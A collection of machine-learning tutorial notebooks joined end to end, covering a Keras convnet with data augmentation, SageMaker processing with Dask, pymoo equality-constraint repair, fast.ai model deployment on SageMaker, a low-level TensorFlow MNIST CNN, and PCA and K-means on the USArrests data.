model.add(layers.Conv2D(32, (3, 3), activation='relu',
input_shape=(150, 150, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Flatten())
model.add(layers.Dropout(0.5))
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-4),
metrics=['acc'])
```
Let's train our network using data augmentation and dropout:
```
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,)
# Note that the validation data should not be augmented!
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
# This is the target directory
train_dir,
# All images will be resized to 150x150
target_size=(150, 150),
batch_size=32,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size=(150, 150),
batch_size=32,
class_mode='binary')
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=100,
validation_data=validation_generator,
validation_steps=50)
```
Let's save our model -- we will be using it in the section on convnet visualization.
```
model.save('cats_and_dogs_small_2.h5')
```
Let's plot our results again:
```
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
```
Thanks to data augmentation and dropout, we are no longer overfitting: the training curves are rather closely tracking the validation
curves. We are now able to reach an accuracy of 82%, a 15% relative improvement over the non-regularized model.
By leveraging regularization techniques even further and by tuning the network's parameters (such as the number of filters per convolution
layer, or the number of layers in the network), we may be able to get an even better accuracy, likely up to 86-87%. However, it would prove
very difficult to go any higher just by training our own convnet from scratch, simply because we have so little data to work with. As a
next step to improve our accuracy on this problem, we will have to leverage a pre-trained model, which will be the focus of the next two
sections.
| github_jupyter |
# Feature transformation with Amazon SageMaker Processing and Dask
Typically a machine learning (ML) process consists of few steps. First, gathering data with various ETL jobs, then pre-processing the data, featurizing the dataset by incorporating standard techniques or prior knowledge, and finally training an ML model using an algorithm.
Often, distributed data processing frameworks such as Dask are used to pre-process data sets in order to prepare them for training. In this notebook we'll use Amazon SageMaker Processing, and leverage the power of Dask in a managed SageMaker environment to run our preprocessing workload.
### What is Dask Distributed?
Dask.distributed: is a lightweight and open source library for distributed computing in Python. It is also a centrally managed, distributed, dynamic task scheduler. It is also a centrally managed, distributed, dynamic task scheduler. Dask has three main components:
**dask-scheduler process:** coordinates the actions of several workers. The scheduler is asynchronous and event-driven, simultaneously responding to requests for computation from multiple clients and tracking the progress of multiple workers.
**dask-worker processes:** Which are spread across multiple machines and the concurrent requests of several clients.
**dask-client process:** which is is the primary entry point for users of dask.distributed
<img src="https://docs.dask.org/en/latest/_images/dask-overview.svg">
source: https://docs.dask.org/en/latest/
## Contents
1. [Objective](#Objective:-predict-the-age-of-an-Abalone-from-its-physical-measurement)
1. [Setup](#Setup)
1. [Using Amazon SageMaker Processing to execute a Dask Job](#Using-Amazon-SageMaker-Processing-to-execute-a-Dask-Job)
1. [Downloading dataset and uploading to S3](#Downloading-dataset-and-uploading-to-S3)
1. [Build a Dask container for running the preprocessing job](#Build-a-Dask-container-for-running-the-preprocessing-job)
1. [Run the preprocessing job using Amazon SageMaker Processing](#Run-the-preprocessing-job-using-Amazon-SageMaker-Processing)
1. [Inspect the preprocessed dataset](#Inspect-the-preprocessed-dataset)
## Setup
Let's start by specifying:
* The S3 bucket and prefixes that you use for training and model data. Use the default bucket specified by the Amazon SageMaker session.
* The IAM role ARN used to give processing and training access to the dataset.
```
from time import gmtime, strftime
import sagemaker
sagemaker_session = sagemaker.Session()
role = sagemaker.get_execution_role()
bucket = sagemaker_session.default_bucket()
timestamp_prefix = strftime("%Y-%m-%d-%H-%M-%S", gmtime())
prefix = "sagemaker/dask-preprocess-demo"
input_prefix = prefix + "/input/raw/census"
input_preprocessed_prefix = prefix + "/input/preprocessed/census"
model_prefix = prefix + "/model"
```
## Using Amazon SageMaker Processing to execute a Dask job
### Downloading dataset and uploading to Amazon Simple Storage Service (Amazon S3)
The dataset used here is the Census-Income KDD Dataset. The first step are to select features, clean the data, and turn the data into features that the training algorithm can use to train a binary classification model which can then be used to predict whether rows representing census responders have an income greater or less than $50,000. In this example, we will use Dask distributed to preprocess and transform the data to make it ready for the training process. In the next section, you download from the bucket below then upload to your own bucket so that Amazon SageMaker can access the dataset.
```
import boto3
import pandas as pd
s3 = boto3.client('s3')
region = sagemaker_session.boto_region_name
input_data = 's3://sagemaker-sample-data-{}/processing/census/census-income.csv'.format(region)
!aws s3 cp $input_data .
# Uploading the training data to S3
sagemaker_session.upload_data(path='census-income.csv', bucket=bucket, key_prefix=input_prefix)
```
### Build a dask container for running the preprocessing job
An example Dask container is included in the `./container` directory of this example. The container handles the bootstrapping of Dask Scheduler and mapping each instance to a Dask Worke. At a high level the container provides:
* A set of default worker/scheduler configurations
* A bootstrapping script for configuring and starting up scheduler/worker nodes
* Starting dask cluster from all the workers including the scheduler node
After the container build and push process is complete, use the Amazon SageMaker Python SDK to submit a managed, distributed dask application that performs our dataset preprocessing.
### Build the example Dask container.
```
%cd container
!docker build -t sagemaker-dask-example .
%cd ../
```
### Create an Amazon Elastic Container Registry (Amazon ECR) repository for the Dask container and push the image.
```
import boto3
account_id = boto3.client('sts').get_caller_identity().get('Account')
region = boto3.session.Session().region_name
ecr_repository = 'sagemaker-dask-example'
tag = ':latest'
uri_suffix = 'amazonaws.com'
if region in ['cn-north-1', 'cn-northwest-1']:
uri_suffix = 'amazonaws.com.cn'
dask_repository_uri = '{}.dkr.ecr.{}.{}/{}'.format(account_id, region, uri_suffix, ecr_repository + tag)
# Create ECR repository and push docker image
!$(aws ecr get-login --region $region --registry-ids $account_id --no-include-email)
!aws ecr create-repository --repository-name $ecr_repository
!docker tag {ecr_repository + tag} $dask_repository_uri
!docker push $dask_repository_uri
```
### Run the preprocessing job using Amazon SageMaker Processing on Dask Cluster
Next, use the Amazon SageMaker Python SDK to submit a processing job. Use the the custom Dask container that was just built, and a Scikit Learn script for preprocessing in the job configuration.
#### Create the Dask preprocessing script.
```
%%writefile preprocess.py
from __future__ import print_function, unicode_literals
import argparse
import json
import logging
import os
import sys
import time
import warnings
import boto3
import numpy as np
import pandas as pd
from tornado import gen
import dask.dataframe as dd
import joblib
from dask.distributed import Client
from sklearn.compose import make_column_transformer
from sklearn.exceptions import DataConversionWarning
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import (
KBinsDiscretizer,
LabelBinarizer,
OneHotEncoder,
PolynomialFeatures,
StandardScaler,
)
warnings.filterwarnings(action="ignore", category=DataConversionWarning)
attempts_counter = 3
attempts = 0
def upload_objects(bucket, prefix, local_path):
try:
bucket_name = bucket # s3 bucket name
root_path = local_path # local folder for upload
s3_bucket = s3_client.Bucket(bucket_name)
for path, subdirs, files in os.walk(root_path):
for file in files:
s3_bucket.upload_file(
os.path.join(path, file), "{}/output/{}".format(prefix, file)
)
except Exception as err:
logging.exception(err)
def print_shape(df):
negative_examples, positive_examples = np.bincount(df["income"])
print(
"Data shape: {}, {} positive examples, {} negative examples".format(
df.shape, positive_examples, negative_examples
)
)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--train-test-split-ratio", type=float, default=0.3)
args, _ = parser.parse_known_args()
# Get processor scrip arguments
args_iter = iter(sys.argv[1:])
script_args = dict(zip(args_iter, args_iter))
scheduler_ip = sys.argv[-1]
# S3 client
s3_region = script_args["s3_region"]
s3_client = boto3.resource("s3", s3_region)
print(f'Using the {s3_region} region')
# Start the Dask cluster client
try:
client = Client("tcp://{ip}:8786".format(ip=scheduler_ip))
logging.info("Printing cluster information: {}".format(client))
except Exception as err:
logging.exception(err)
columns = [
"age",
"education",
"major industry code",
"class of worker",
"num persons worked for employer",
"capital gains",
"capital losses",
"dividends from stocks",
"income",
]
class_labels = [" - 50000.", " 50000+."]
input_data_path = "s3://{}".format(os.path.join(
script_args["s3_input_bucket"],
script_args["s3_input_key_prefix"],
"census-income.csv",
))
# Creating the necessary paths to save the output files
if not os.path.exists("/opt/ml/processing/train"):
os.makedirs("/opt/ml/processing/train")
if not os.path.exists("/opt/ml/processing/test"):
os.makedirs("/opt/ml/processing/test")
print("Reading input data from {}".format(input_data_path))
df = pd.read_csv(input_data_path)
df = pd.DataFrame(data=df, columns=columns)
df.dropna(inplace=True)
df.drop_duplicates(inplace=True)
df.replace(class_labels, [0, 1], inplace=True)
negative_examples, positive_examples = np.bincount(df["income"])
print(
"Data after cleaning: {}, {} positive examples, {} negative examples".format(
df.shape, positive_examples, negative_examples
)
)
split_ratio = args.train_test_split_ratio
print("Splitting data into train and test sets with ratio {}".format(split_ratio))
X_train, X_test, y_train, y_test = train_test_split(
df.drop("income", axis=1), df["income"], test_size=split_ratio, random_state=0
)
preprocess = make_column_transformer(
(
KBinsDiscretizer(encode="onehot-dense", n_bins=2),
["age", "num persons worked for employer"],
),
(
StandardScaler(),
["capital gains", "capital losses", "dividends from stocks"],
),
(
OneHotEncoder(sparse=False),
["education", "major industry code", "class of worker"],
),
)
print("Running preprocessing and feature engineering transformations in Dask")
with joblib.parallel_backend("dask"):
train_features = preprocess.fit_transform(X_train)
test_features = preprocess.transform(X_test)
print("Train data shape after preprocessing: {}".format(train_features.shape))
print("Test data shape after preprocessing: {}".format(test_features.shape))
train_features_output_path = os.path.join(
"/opt/ml/processing/train", "train_features.csv"
)
train_labels_output_path = os.path.join(
"/opt/ml/processing/train", "train_labels.csv"
)
test_features_output_path = os.path.join(
"/opt/ml/processing/test", "test_features.csv"
)
test_labels_output_path = os.path.join("/opt/ml/processing/test", "test_labels.csv")
print("Saving training features to {}".format(train_features_output_path))
pd.DataFrame(train_features).to_csv(
train_features_output_path, header=False, index=False
)
print("Saving test features to {}".format(test_features_output_path))
pd.DataFrame(test_features).to_csv(
test_features_output_path, header=False, index=False
)
print("Saving training labels to {}".format(train_labels_output_path))
y_train.to_csv(train_labels_output_path, header=False, index=False)
print("Saving test labels to {}".format(test_labels_output_path))
y_test.to_csv(test_labels_output_path, header=False, index=False)
upload_objects(
script_args["s3_output_bucket"],
script_args["s3_output_key_prefix"],
"/opt/ml/processing/train/",
)
upload_objects(
script_args["s3_output_bucket"],
script_args["s3_output_key_prefix"],
"/opt/ml/processing/test/",
)
# wait for the file creation
while attempts < attempts_counter:
if os.path.exists(train_features_output_path) and os.path.isfile(
train_features_output_path
):
try:
# Calculate the processed dataset baseline statistics on the Dask cluster
dask_df = dd.read_csv(train_features_output_path)
dask_df = client.persist(dask_df)
baseline = dask_df.describe().compute()
print(baseline)
break
except:
time.sleep(2)
if attempts == attempts_counter:
raise Exception(
"Output file {} couldn't be found".format(train_features_output_path)
)
print(client)
sys.exit(os.EX_OK)
```
Run a processing job using the Docker image and preprocessing script you just created. When invoking the `dask_processor.run()` function, pass the Amazon S3 input and output paths as arguments that are required by our preprocessing script to determine input and output location in Amazon S3. Here, you also specify the number of instances and instance type that will be used for the distributed Spark job.
```
from sagemaker.processing import ProcessingInput, ScriptProcessor
dask_processor = ScriptProcessor(
base_job_name="dask-preprocessor",
image_uri=dask_repository_uri,
command=["/opt/program/bootstrap.py"],
role=role,
instance_count=2,
instance_type="ml.m5.large",
max_runtime_in_seconds=1200,
)
dask_processor.run(
code="preprocess.py",
arguments=[
"s3_input_bucket",
bucket,
"s3_input_key_prefix",
input_prefix,
"s3_output_bucket",
bucket,
"s3_output_key_prefix",
input_preprocessed_prefix,
"s3_region",
region
],
logs=True
)
```
#### Inspect the preprocessed dataset
Take a look at a few rows of the transformed dataset to make sure the preprocessing was successful.
```
print('Top 5 rows from s3://{}/{}/train/'.format(bucket, input_preprocessed_prefix))
!aws s3 cp --quiet s3://$bucket/$input_preprocessed_prefix/output/train_features.csv - | head -n5
```
Now, you can use the output files of the transformation process as input to a training job and train a regression model.
| github_jupyter |
## Constraint Handling
### Inequality Constraints
**If somebody is interested in implementing or willing to make contribution(s) regarding constraint handling of inequality constraints please let us know.
The G problem is suite is already available to experiment with different algorithms. So far, mostly parameter-less constraint handling is used for our algorithms.**
### Equality Constraints
We got a couple of questions of how equality constraints should be handled in a genetic algorithm. In general, functions without any smoothness are challenging to handle for genetic algorithms. An equality constraint is basically an extreme case, where the constraint violation is 0 at exactly one point and otherwise 1.
Let us consider the following constraint $g(x)$ where $x$ represents a variable:
$g(x): x = 5$
An equality constraint can be expressed by an inequality constraint:
$g(x): |x - 5| \leq 0$
or
$g(x): (x-5)^2 \leq 0$
However, all of constraints above are very strict and make **most of the search space infeasible**. Without providing more information to the algorithm those constraint are very difficult to satisfy.
For this reason, the constraint can be smoothed by adding an epsilon to it and, therefore, having two inequality constraints:
$g'(x): 5 - \epsilon \leq x \leq 5 + \epsilon$
Also, it can be simply expressed in one inequality constraint by:
$g'(x): (x-5)^2 - \hat{\epsilon} \leq 0$
Depending on the $\epsilon$ the solutions will be more or less close to the desired value. However, the genetic algorithm does not know anything about the problem itself which makes it difficult to handle and focus the search in the infeasible space.
**Constraint Handling Through Repair**
A simple approach is to handle constraints through a repair function. This is only possible if the equation of the constraint is known. The repair makes sure every solution that is evaluated is in fact feasible. Let us consider the following example where
the equality constraints need to consider more than one variable:
\begin{align}
\begin{split}
\min \;\; & f_1(x) = (x_1^2 + x_2^2) \\
\max \;\; & f_2(x) = -(x_1-1)^2 - x_2^2 \\[1mm]
\text{s.t.} \;\; & g_1(x_1, x_3) : x_1 + x_3 = 2\\[2mm]
& -2 \leq x_1 \leq 2 \\
& -2 \leq x_2 \leq 2 \\
& -2 \leq x_3 \leq 2
\end{split}
\end{align}
We implement the problem using by squaring the term and using an $\epsilon$ as we have explained above. The source code for the problem looks as follows:
```
import numpy as np
from pymoo.model.problem import Problem
class MyProblem(Problem):
def __init__(self):
super().__init__(n_var=3,
n_obj=2,
n_constr=1,
xl=np.array([-2, -2, -2]),
xu=np.array([2, 2, 2]))
def _evaluate(self, x, out, *args, **kwargs):
f1 = x[:, 0] ** 2 + x[:, 1] ** 2
f2 = (x[:, 0] - 1) ** 2 + x[:, 1] ** 2
g1 = (x[:, 0] + x[:, 2] - 2) ** 2 - 1e-5
out["F"] = np.column_stack([f1, f2])
out["G"] = g1
```
As you might have noticed the problem has similar characteristics to problem in our getting started.
Before a solution is evaluated a repair function is called. To make sure a solution is feasible, an approach would be to either set $x_3 = 2 - x_1$ or $x_1 = 2 - x_3$. Additionally, we need to consider that this repair might produce a variable to be out of bounds.
```
from pymoo.model.repair import Repair
class MyRepair(Repair):
def _do(self, problem, pop, **kwargs):
for k in range(len(pop)):
x = pop[k].X
if np.random.random() < 0.5:
x[2] = 2 - x[0]
if x[2] > 2:
val = x[2] - 2
x[0] += val
x[2] -= val
else:
x[0] = 2 - x[2]
if x[0] > 2:
val = x[0] - 2
x[2] += val
x[0] -= val
return pop
```
Now the algorithm object needs to be initialized with the repair operator and then can be run to solve the problem:
```
from pymoo.algorithms.nsga2 import NSGA2
algorithm = NSGA2(pop_size=100, repair=MyRepair(), eliminate_duplicates=True)
from pymoo.optimize import minimize
from pymoo.visualization.scatter import Scatter
res = minimize(MyProblem(),
algorithm,
('n_gen', 20),
seed=1,
verbose=True)
plot = Scatter()
plot.add(res.F, color="red")
plot.show()
```
In our case it is easy to verify if the constraint is violated or not:
```
print(res.X[:, 0] + res.X[:, 2])
```
If you would like to compare the solution without a repair you will see how searching only in the feasible space helps:
```
algorithm = NSGA2(pop_size=100, eliminate_duplicates=True)
res = minimize(MyProblem(),
algorithm,
('n_gen', 20),
seed=1,
verbose=True)
plot = Scatter()
plot.add(res.F, color="red")
plot.show()
print(res.X[:, 0] + res.X[:, 2])
```
Here in fact the $\epsilon$ term is necessary to find any feasible solution at all.
| github_jupyter |
# Fast.ai PyTorch Caltech 256 deployment
## Pre-requisites
This notebook shows how to use the SageMaker Python SDK to take your existing trained fast.ai model in a local container before deploying to SageMaker's managed hosting environments based on the PyTorch framework. This can speed up iterative testing and debugging while using the same familiar Python SDK interface. Just change your estimator's `instance_type` to `local`.
In order to use this feature you'll need to install docker-compose (and nvidia-docker if training with a GPU).
**Note, you can only run a single local notebook at one time.**
```
!/bin/bash ./setup.sh
```
## Overview
The **SageMaker Python SDK** helps you deploy your models for training and hosting in optimized, productions ready containers in SageMaker. The SageMaker Python SDK is easy to use, modular, extensible and compatible with TensorFlow, MXNet, PyTorch and Chainer. This tutorial focuses on how to take an existing pretrained fast.ai based convulutional neural network trained on the Caltech 256 dataset (http://www.vision.caltech.edu/Image_Datasets/Caltech256/) using **PyTorch in local mode**.
### Set up the environment
This notebook was created and tested on a single ml.m4.xlarge notebook instance.
Let's start by specifying:
- The S3 Bucket where the model data is stored.
- The Model Data prefix which is the S3 prefix to the zipped model. Must contain the weights of the fast.ai model saved with .h5 extension. Model tarball must also contain a file called `classes.json` containing list of the class names used for classification.
- The IAM role arn used to give training and hosting access to your data. See the documentation for how to create these. Note, if more than one role is required for notebook instances, training, and/or hosting, please replace the sagemaker.get_execution_role() with appropriate full IAM role arn string(s).
```
import sagemaker
import boto3
region = boto3.session.Session().region_name
account_id = boto3.client('sts').get_caller_identity().get('Account')
bucket = 'sagemaker-{}-{}'.format(account_id, region)
model_data_prefix='models/caltech256_fastai_sagemaker/model.tar.gz'
model_data_url=f's3://{bucket}/{model_data_prefix}'
print(f'Model Data URL is: {model_data_url}')
sagemaker_session = sagemaker.Session()
role = sagemaker.get_execution_role()
```
## Host
### Hosting script
We are going to provide custom implementation of `model_fn`, `input_fn`, `output_fn` and `predict_fn` hosting functions in a separate file:
```
!pygmentize 'source/app.py'
```
### Import model into SageMaker
The PyTorch model uses a npy serializer and deserializer by default. For this example, since we have a custom implementation of all the hosting functions and plan on using a byte based input and JSON output, we need a predictor that can deserialize JSON.
```
from sagemaker.predictor import RealTimePredictor, json_deserializer
class ImagePredictor(RealTimePredictor):
def __init__(self, endpoint_name, sagemaker_session):
super(ImagePredictor, self).__init__(endpoint_name, sagemaker_session=sagemaker_session, serializer=None,
deserializer=json_deserializer, content_type='image/jpeg')
```
To deploy the model either locally or as a SageMaker Endpoint we need to create a PyTorchModel object using the latest training job to get the S3 location of the trained model data. Besides model data location in S3, we also need to configure PyTorchModel with the script and source directory (because our `app` script requires fast.ai model classes from source directory), an IAM role.
```
from sagemaker.pytorch import PyTorchModel
# Configure an PyTorch Model
pytorch_model = PyTorchModel(model_data=model_data_url,
source_dir='source',
entry_point='app.py',
role=role,
predictor_cls=ImagePredictor)
```
### Create endpoint
Now the model is ready to be deployed at a SageMaker endpoint and we are going to use the `sagemaker.pytorch.model.PyTorchModel.deploy` method to do this. We can set the value of instance type to `local` if we want to deploy and test locally on our notebook instance. Once you have tested it out locallyed we can deploy as a SageMaker endpoint using a CPU-based instance for inference (e.g. ml.m4.xlarge), even though the model may have been trained on GPU instances.
```
# set the instance_type to 'local' for local testing on the instance and SageMaker instance type to deploy to AWS
instance_type='local'
#instance_type='ml.m4.xlarge'
#!docker kill $(docker ps -q)
# In Local Mode, fit will pull the PyTorch container docker image and run it locally
predictor = pytorch_model.deploy(instance_type=instance_type, initial_instance_count=1)
```
### Evaluate
We are going to use our deployed model to do object classification based on a submitted image.
```
import io
import requests
from PIL import Image
```
Enter the URL of an image from the from the site: http://www.vision.caltech.edu/Image_Datasets/Caltech256/images/
```
IMG_URL='http://www.vision.caltech.edu/Image_Datasets/Caltech256/images/010.beer-mug/010_0011.jpg'
#IMG_URL='http://www.vision.caltech.edu/Image_Datasets/Caltech256/images/002.american-flag/002_0019.jpg'
#IMG_URL='http://www.vision.caltech.edu/Image_Datasets/Caltech256/images/038.chimp/038_0009.jpg'
```
Let's download the image from the URL and display the image.
```
response = requests.get(IMG_URL)
img_pil = Image.open(io.BytesIO(response.content))
img_pil
```
Now we will call the prediction endpoint.
```
# Serializes data and makes a prediction request to the endpoint (local or sagemaker)
response = predictor.predict(response.content)
response
```
### Cleanup
After you have finished with this example, remember to delete the prediction endpoint to release the instance(s) associated with it.
```
sagemaker_session.delete_endpoint(predictor.endpoint)
```
| github_jupyter |
Deep Learning Models -- A collection of various deep learning architectures, models, and tips for TensorFlow and PyTorch in Jupyter Notebooks.
- Author: Sebastian Raschka
- GitHub Repository: https://github.com/rasbt/deeplearning-models
```
%load_ext watermark
%watermark -a 'Sebastian Raschka' -v -p tensorflow
```
# Model Zoo -- Convolutional Neural Network
### Low-level Implementation
```
import tensorflow as tf
from functools import reduce
from tensorflow.examples.tutorials.mnist import input_data
##########################
### DATASET
##########################
mnist = input_data.read_data_sets("./", one_hot=True)
##########################
### SETTINGS
##########################
# Hyperparameters
learning_rate = 0.1
dropout_keep_proba = 0.5
epochs = 3
batch_size = 32
# Architecture
input_size = 784
image_width, image_height = 28, 28
n_classes = 10
# Other
print_interval = 500
random_seed = 123
##########################
### WRAPPER FUNCTIONS
##########################
def conv2d(input_tensor, output_channels,
kernel_size=(5, 5), strides=(1, 1, 1, 1),
padding='SAME', activation=None, seed=None,
name='conv2d'):
with tf.name_scope(name):
input_channels = input_tensor.get_shape().as_list()[-1]
weights_shape = (kernel_size[0], kernel_size[1],
input_channels, output_channels)
weights = tf.Variable(tf.truncated_normal(shape=weights_shape,
mean=0.0,
stddev=0.01,
dtype=tf.float32,
seed=seed),
name='weights')
biases = tf.Variable(tf.zeros(shape=(output_channels,)), name='biases')
conv = tf.nn.conv2d(input=input_tensor,
filter=weights,
strides=strides,
padding=padding)
act = conv + biases
if activation is not None:
act = activation(conv + biases)
return act
def fully_connected(input_tensor, output_nodes,
activation=None, seed=None,
name='fully_connected'):
with tf.name_scope(name):
input_nodes = input_tensor.get_shape().as_list()[1]
weights = tf.Variable(tf.truncated_normal(shape=(input_nodes,
output_nodes),
mean=0.0,
stddev=0.01,
dtype=tf.float32,
seed=seed),
name='weights')
biases = tf.Variable(tf.zeros(shape=[output_nodes]), name='biases')
act = tf.matmul(input_tensor, weights) + biases
if activation is not None:
act = activation(act)
return act
##########################
### GRAPH DEFINITION
##########################
g = tf.Graph()
with g.as_default():
tf.set_random_seed(random_seed)
# Input data
tf_x = tf.placeholder(tf.float32, [None, input_size, 1], name='inputs')
tf_y = tf.placeholder(tf.float32, [None, n_classes], name='targets')
keep_proba = tf.placeholder(tf.float32, shape=None, name='keep_proba')
# Convolutional Neural Network:
# 2 convolutional layers with maxpool and ReLU activation
input_layer = tf.reshape(tf_x, shape=[-1, image_width, image_height, 1])
conv1 = conv2d(input_tensor=input_layer,
output_channels=8,
kernel_size=(3, 3),
strides=(1, 1, 1, 1),
activation=tf.nn.relu,
name='conv1')
pool1 = tf.nn.max_pool(conv1,
ksize=(1, 2, 2, 1),
strides=(1, 1, 1, 1),
padding='SAME',
name='maxpool1')
conv2 = conv2d(input_tensor=pool1,
output_channels=16,
kernel_size=(3, 3),
strides=(1, 1, 1, 1),
activation=tf.nn.relu,
name='conv2')
pool2 = tf.nn.max_pool(conv2,
ksize=(1, 2, 2, 1),
strides=(1, 1, 1, 1),
padding='SAME',
name='maxpool2')
dims = pool2.get_shape().as_list()[1:]
dims = reduce(lambda x, y: x * y, dims, 1)
flat = tf.reshape(pool2, shape=(-1, dims))
fc = fully_connected(flat, output_nodes=64,
activation=tf.nn.relu)
fc = tf.nn.dropout(fc, keep_prob=keep_proba)
out_layer = fully_connected(fc, n_classes, activation=None,
name='logits')
# Loss and optimizer
loss = tf.nn.softmax_cross_entropy_with_logits(logits=out_layer, labels=tf_y)
cost = tf.reduce_mean(loss, name='cost')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
train = optimizer.minimize(cost, name='train')
# Prediction
correct_prediction = tf.equal(tf.argmax(tf_y, 1),
tf.argmax(out_layer, 1),
name='correct_prediction')
accuracy = tf.reduce_mean(tf.cast(correct_prediction,
tf.float32),
name='accuracy')
import numpy as np
##########################
### TRAINING & EVALUATION
##########################
with tf.Session(graph=g) as sess:
sess.run(tf.global_variables_initializer())
np.random.seed(random_seed) # random seed for mnist iterator
for epoch in range(1, epochs + 1):
avg_cost = 0.
total_batch = mnist.train.num_examples // batch_size
for i in range(total_batch):
batch_x, batch_y = mnist.train.next_batch(batch_size)
batch_x = batch_x[:, :, None] # add "missing" color channel
_, c = sess.run(['train', 'cost:0'],
feed_dict={'inputs:0': batch_x,
'targets:0': batch_y,
'keep_proba:0': dropout_keep_proba})
avg_cost += c
if not i % print_interval:
print("Minibatch: %03d | Cost: %.3f" % (i + 1, c))
train_acc = sess.run('accuracy:0',
feed_dict={'inputs:0': mnist.train.images[:, :, None],
'targets:0': mnist.train.labels,
'keep_proba:0': 1.0})
valid_acc = sess.run('accuracy:0',
feed_dict={'inputs:0': mnist.validation.images[:, :, None],
'targets:0': mnist.validation.labels,
'keep_proba:0': 1.0})
print("Epoch: %03d | AvgCost: %.3f" % (epoch, avg_cost / (i + 1)), end="")
print(" | Train/Valid ACC: %.3f/%.3f" % (train_acc, valid_acc))
test_acc = sess.run('accuracy:0',
feed_dict={'inputs:0': mnist.test.images[:, :, None],
'targets:0': mnist.test.labels,
'keep_proba:0': 1.0})
print('Test ACC: %.3f' % test_acc)
```
| github_jupyter |
# Chapter 10 - Unsupervised Learning
- [Lab 1: Principal Component Analysis](#Lab-1:-Principal-Component-Analysis)
- [Lab 2: K-Means Clustering](#Lab-2:-Clustering)
- [Lab 2: Hierarchical Clustering](#10.5.3-Hierarchical-Clustering)
- [Lab 3: NCI60 Data Example](#Lab-3:-NCI60-Data-Example)
```
# %load ../standard_import.txt
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.preprocessing import scale
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
from scipy.cluster import hierarchy
import warnings
warnings.filterwarnings('ignore')
%matplotlib inline
plt.style.use('seaborn-white')
```
## Lab 1: Principal Component Analysis
```
# In R, I exported the dataset to a csv file. It is part of the base R distribution.
df = pd.read_csv('Data/USArrests.csv', index_col=0)
df.info()
df.mean()
df.var()
X = pd.DataFrame(scale(df), index=df.index, columns=df.columns)
# The loading vectors
pca_loadings = pd.DataFrame(PCA().fit(X).components_.T, index=df.columns, columns=['V1', 'V2', 'V3', 'V4'])
pca_loadings
# Fit the PCA model and transform X to get the principal components
pca = PCA()
df_plot = pd.DataFrame(pca.fit_transform(X), columns=['PC1', 'PC2', 'PC3', 'PC4'], index=X.index)
df_plot
fig , ax1 = plt.subplots(figsize=(9,7))
ax1.set_xlim(-3.5,3.5)
ax1.set_ylim(-3.5,3.5)
# Plot Principal Components 1 and 2
for i in df_plot.index:
ax1.annotate(i, (df_plot.PC1.loc[i], -df_plot.PC2.loc[i]), ha='center')
# Plot reference lines
ax1.hlines(0,-3.5,3.5, linestyles='dotted', colors='grey')
ax1.vlines(0,-3.5,3.5, linestyles='dotted', colors='grey')
ax1.set_xlabel('First Principal Component')
ax1.set_ylabel('Second Principal Component')
# Plot Principal Component loading vectors, using a second y-axis.
ax2 = ax1.twinx().twiny()
ax2.set_ylim(-1,1)
ax2.set_xlim(-1,1)
ax2.tick_params(axis='y', colors='orange')
ax2.set_xlabel('Principal Component loading vectors', color='orange')
# Plot labels for vectors. Variable 'a' is a small offset parameter to separate arrow tip and text.
a = 1.07
for i in pca_loadings[['V1', 'V2']].index:
ax2.annotate(i, (pca_loadings.V1.loc[i]*a, -pca_loadings.V2.loc[i]*a), color='orange')
# Plot vectors
ax2.arrow(0,0,pca_loadings.V1[0], -pca_loadings.V2[0])
ax2.arrow(0,0,pca_loadings.V1[1], -pca_loadings.V2[1])
ax2.arrow(0,0,pca_loadings.V1[2], -pca_loadings.V2[2])
ax2.arrow(0,0,pca_loadings.V1[3], -pca_loadings.V2[3]);
# Standard deviation of the four principal components
np.sqrt(pca.explained_variance_)
pca.explained_variance_
pca.explained_variance_ratio_
plt.figure(figsize=(7,5))
plt.plot([1,2,3,4], pca.explained_variance_ratio_, '-o', label='Individual component')
plt.plot([1,2,3,4], np.cumsum(pca.explained_variance_ratio_), '-s', label='Cumulative')
plt.ylabel('Proportion of Variance Explained')
plt.xlabel('Principal Component')
plt.xlim(0.75,4.25)
plt.ylim(0,1.05)
plt.xticks([1,2,3,4])
plt.legend(loc=2);
```
## Lab 2: Clustering
### 10.5.1 K-Means Clustering
```
# Generate data
np.random.seed(2)
X = np.random.standard_normal((50,2))
X[:25,0] = X[:25,0]+3
X[:25,1] = X[:25,1]-4
```
#### K = 2
```
km1 = KMeans(n_clusters=2, n_init=20)
km1.fit(X)
km1.labels_
```
See plot for K=2 below.
#### K = 3
```
np.random.seed(4)
km2 = KMeans(n_clusters=3, n_init=20)
km2.fit(X)
pd.Series(km2.labels_).value_counts()
km2.cluster_centers_
km2.labels_
# Sum of distances of samples to their closest cluster center.
km2.inertia_
fig, (ax1, ax2) = plt.subplots(1,2, figsize=(14,5))
ax1.scatter(X[:,0], X[:,1], s=40, c=km1.labels_, cmap=plt.cm.prism)
ax1.set_title('K-Means Clustering Results with K=2')
